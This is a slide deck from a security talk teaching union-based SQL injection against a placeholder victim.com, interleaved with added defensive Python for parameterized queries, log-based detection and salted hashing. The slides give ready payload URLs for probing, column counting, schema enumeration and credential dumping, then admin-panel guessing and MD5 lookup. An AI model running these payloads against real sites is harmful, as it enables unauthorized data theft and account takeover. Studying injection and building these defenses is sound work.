$Who I am? - HconGroups groups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql...


$Who I am?

Naeemahemad Mansuri

Student of Semester II of Master in Computer Application in LJMCA

Individual Security Researcher

Contact :

FB -> fb.me/mansurinaeem

G talk -> [email protected]

UNSAFE WEB APPLICATION STATISTICS

• F-Secure claims 500,000 sites were affected by SQL injection in 2008

• According to http://www.zone-h.org, defacement statistics are 1 to 5 million web sites

• Over 1.5 million pages were affected by the shadow server with the help of SQL injection attacks

SQL Injection Vulnerability

[Diagram: the client sends a Request to the Web Server, the Web Server runs "Select * from table name where id=123" on the DBMS Server, and the Response comes back]

http://www.victim.com/site.php?id=123

When we request this URL, the application sends the query written in its code to the database, for example:

Select * from table name where id =123

When the request completes, the web server returns the database result to us as the response.
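As an added example that is not part of the original slides, the request-to-query flow above in Python, with an in-memory SQLite database standing in for the web application and its DBMS. `lookup_vulnerable` pastes the `id` parameter into the SQL text the way the slide describes site.php doing, while `lookup_parameterized` binds it as data. The table and column names (`products`, `users`, `pw_hash`) and the rows are constructed for the demonstration; the probe values run through both functions are the ones the later slides use (`order by N` and a `union select`), so the defender can see why one form leaks and the other does not.

```python
import sqlite3


def build_db():
    """Constructed in-memory database standing in for the site's DBMS.
    Table and column names are assumptions for this demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (123, 'widget', 9.99), (124, 'gadget', 19.99);
        CREATE TABLE users (id INTEGER, username TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return conn


def lookup_vulnerable(conn, raw_id):
    """What site.php?id=... does when the parameter is pasted into the SQL text:
    whatever the client sends becomes part of the statement the DBMS parses."""
    sql = "SELECT id, name, price FROM products WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, raw_id):
    """Hardened form: the statement text is fixed and the value is bound as data.
    The DBMS never parses the parameter, so it cannot add clauses to the query.
    SQLite applies the column's numeric affinity to the bound text, so '123'
    still matches id 123, while '123 order by 7' is just a non-matching string."""
    sql = "SELECT id, name, price FROM products WHERE id=?"
    return conn.execute(sql, (raw_id,)).fetchall()


def outcome(lookup, conn, raw_id):
    """Summarise what the application (and therefore the client) observes:
    a row count on success, or 'error' when the DBMS rejects the statement.
    An error that depends on the input is exactly the signal the probing
    slides rely on, so it is also what a defender should never expose."""
    try:
        return "rows=%d" % len(lookup(conn, raw_id))
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    db = build_db()
    probes = [
        "123",                                                  # normal request
        "123 order by 3",                                       # fits the 3-column query
        "123 order by 7",                                       # exceeds it: error
        "-123 union select id, username, pw_hash from users",  # union over another table
    ]
    for p in probes:
        print("%-52s vulnerable:%-8s parameterized:%s" % (
            p, outcome(lookup_vulnerable, db, p), outcome(lookup_parameterized, db, p)))
```

With the concatenated query the `order by 7` probe produces a DBMS error and the union returns the `users` row; with the bound parameter every probe is either one product row or no rows, and no SQL error reaches the client. In a PHP application the equivalent is a prepared statement (PDO or mysqli with bound parameters) rather than string interpolation into the query.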

SQL injection Basic Concept

SQL injection Classification in Web Application

• SQL Injection Vulnerability

  • SQL Injection

  • Blind Injection

    • Simple Blind SQL Injection

    • Double Blind SQL Injection

Method to Detect the SQL Injection

• Fuzzing

• Function Testing

• Analysis of Source Code

Example of checking whether the web site is vulnerable or not:

http://www.victim.com/site.php?id=123 ' (single quote)

http://www.victim.com/site.php?id=123 '' (double quote)

http://www.victim.com/site.php?id=123 '-- (single quote, minus, minus)

http://www.victim.com/site.php?id=123 '/*

http://www.victim.com/site.php?id=123 '#

Error in SQL injection

The error message you get from the web application when the injected input breaks its SQL query.

Finding the Number of Columns

Now that we have found an SQL-injectable web site, we find the number of columns in the database query; for that the order by clause is used:

http://www.victim.com/site.php?id=123 order by 1 (No Error)

http://www.victim.com/site.php?id=123 order by 2 (No Error)

http://www.victim.com/site.php?id=123 order by 3 (No Error)

http://www.victim.com/site.php?id=123 order by 4 (No Error)

http://www.victim.com/site.php?id=123 order by 5 (No Error)

http://www.victim.com/site.php?id=123 order by 6 (No Error)

http://www.victim.com/site.php?id=123 order by 7 (Error)

The first value that errors is one more than the column count, so here the query has 6 columns. If the above queries do not work, append --, --+ or --+- at the end.

Finding the Vulnerable Columns

After finding the number of columns, we have to find the vulnerable column(s). For that we use union select (or union select all), and we have to put a minus sign before the id value.

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,2,3,4,5,6 --

The result looks like this (screenshot on the original slide):

Finding the version, user, database name

After finding the vulnerable column, we find the database user name, the database name and the version used by the web site.

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,user(),3,4,5,6 --

http://www.victim.com/site.php?id=-123 union select 1,database(),3,4,5,6 --

http://www.victim.com/site.php?id=-123 union select 1,version(),3,4,5,6 --

Finding the Table Names in the DB

After finding the version, user and database, we find the tables in the database. In the vulnerable column we write concat(table_name) or group_concat(table_name), and at the end we write from information_schema.tables where table_schema=database()--

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--

This query displays all the table names.

Finding the Column Names of a Table

After finding the table names, we find the column names of that table. For that we write concat(column_name) or group_concat(column_name), and at the end we write from information_schema.columns where table_name=char()()--

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,concat(column_name),3,4,5,6 from information_schema.columns where table_name=char()()--

* We have to convert the table name with the MySQL char() function.

This query displays all the column names of the table.

Extract the Data

Now that the column query has been performed, we extract (dump) the data.

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,concat(column1,0x3a,column2),3,4,5,6 from admin--

* If admin does not work, convert the table name with the MySQL char() function.

This query displays all the dumped data.
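Every step from the probe list (single quote, `--`, `/*`, `#`) through `order by N`, `union select` and the `information_schema` lookups leaves a distinctive request in the web server's access log. As an added example that is not part of the original slides, here is a small detector in Python that URL-decodes each query parameter of a combined-format log line and reports which of those signatures it matches. The log lines, hosts and paths are constructed for the demonstration, and the rule set is an assumption of what is worth flagging, not a complete signature list.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (Apache combined format). Hosts, paths and
# parameters are assumptions for this demonstration, not data from the slides.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2012:10:00:01 +0000] "GET /site.php?id=123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2012:10:00:02 +0000] "GET /site.php?id=123%27 HTTP/1.1" 500 221 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2012:10:00:03 +0000] "GET /site.php?id=123%20order%20by%207-- HTTP/1.1" 500 221 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2012:10:00:04 +0000] "GET /site.php?id=-123%20union%20select%201,concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 1480 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2012:10:00:05 +0000] "GET /search.php?q=order%20form HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# Each rule is (name, regex applied to a URL-decoded parameter value).
# Decoding first matters: "%27" and "%20union%20select" are what the log holds.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("comment-terminator", re.compile(r"--|/\*|#")),
    ("quote-after-number", re.compile(r"^\s*-?\d+\s*'")),  # 123' on a numeric id
]


def request_target(line):
    """Pull the request target (path?query) out of a combined-format log line."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', line)
    return m.group(1) if m else None


def classify(target):
    """Return the sorted rule names that fire on any decoded parameter value."""
    hits = set()
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.add(rule)
    return sorted(hits)


def scan(lines):
    """Map line index -> rule names for the lines that look like injection probes."""
    findings = {}
    for i, line in enumerate(lines):
        target = request_target(line)
        if target is None:
            continue
        hits = classify(target)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_LOG).items():
        print("line %d: %s" % (idx, ", ".join(rules)))
```

Only the three probing lines are reported; the normal `id=123` request and the `q=order form` search are not, because the rules look for `order by <number>` rather than the word "order". The `comment-terminator` rule is the noisiest (a `--` or `#` can occur in legitimate text), so in practice it is best treated as a weak signal that raises severity when it co-occurs with the others, as it does on the `union select` line. A 5xx status paired with a `quote-after-number` hit is the log-side view of the error message the slides rely on.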

Login voila

After dumping the data we have to find the admin panel of the web site. For that you have to try:

http://www.victim.com/admin/

http://www.victim.com/adminlogin/

http://www.victim.com/controlpanel/

http://www.victim.com/administrator/

http://www.victim.com/manager/

http://www.victim.com/superuser/

We have to try and guess, and you get the admin panel.

If at the time of dumping the data you do not get the password in plain text, you have to decrypt it with this web site -> www.md5decrypter.co.uk/
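The reason an online MD5 lookup works on a dumped password column is that unsalted MD5 is deterministic: the same password always produces the same digest, so a dump is a list of lookup keys. As an added example that is not part of the original slides, the following Python (standard library only) contrasts that storage scheme with salted PBKDF2-HMAC-SHA256, which is what a defender should store instead. The two-entry `KNOWN_MD5` table is a constructed stand-in for what such a lookup site holds, and the iteration count is an assumption.

```python
import hashlib
import hmac
import secrets

# Constructed stand-in for a precomputed MD5 lookup table. The plaintexts are
# assumptions for this demonstration; the digests are the real MD5 values.
KNOWN_MD5 = {
    "5f4dcc3b5aa765d61d8327deb882cf99": "password",
    "e10adc3949ba59abbe56e057f20f883e": "123456",
}


def md5_hex(password):
    """Unsalted MD5 as older applications stored it. No secret is involved, so
    anyone holding the dump can resolve common passwords by table lookup."""
    return hashlib.md5(password.encode()).hexdigest()


def lookup_md5(digest):
    """What an MD5 lookup service does: a dictionary hit, not a decryption."""
    return KNOWN_MD5.get(digest)


def hash_password(password, iterations=200_000, salt=None):
    """Salted, iterated PBKDF2-HMAC-SHA256. A fresh random salt per user means
    two users with the same password get different stored values, so a
    precomputed table is useless and each guess costs `iterations` of work.
    Returns a self-describing string: algorithm$iterations$salt_hex$digest_hex."""
    if salt is None:
        salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    d = md5_hex("password")
    print("md5:", d, "-> table lookup gives:", lookup_md5(d))
    stored = hash_password("password")
    print("pbkdf2:", stored)
    print("verify correct:", verify_password("password", stored),
          "verify wrong:", verify_password("passw0rd", stored))
```

If a framework offers bcrypt, scrypt or Argon2 those are preferable to PBKDF2, but the standard-library version already removes the property the slide exploits: nothing in the dump maps back to a plaintext by lookup.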

Automated Exploitation of SQL injection

• SQLMAP (sqlmap.sourceforge.net or sqlmap.org)

Full Support : MySQL, MSSQL, Oracle, PostgreSQL

• sqlsus (sqlsus.sourceforge.net)

Partial Support : only MySQL support

• HAVIJ (http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/)

Full Support : if you purchase it :P

Partial Support : is also available

You can develop your own scripts and tools to exploit a web site that is vulnerable to SQL injection; it is up to you.

Material of SQL injection & Reference

• http://www.php.net/manual/en/security.database.sql-injection.php

• https://www.owasp.org/index.php/SQL_Injection

• SQL Injection Attacks and Defense - Syngress publication - Justin Clarke

• http://www.Pentestmonkey.net Cheat Sheets: (Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix)
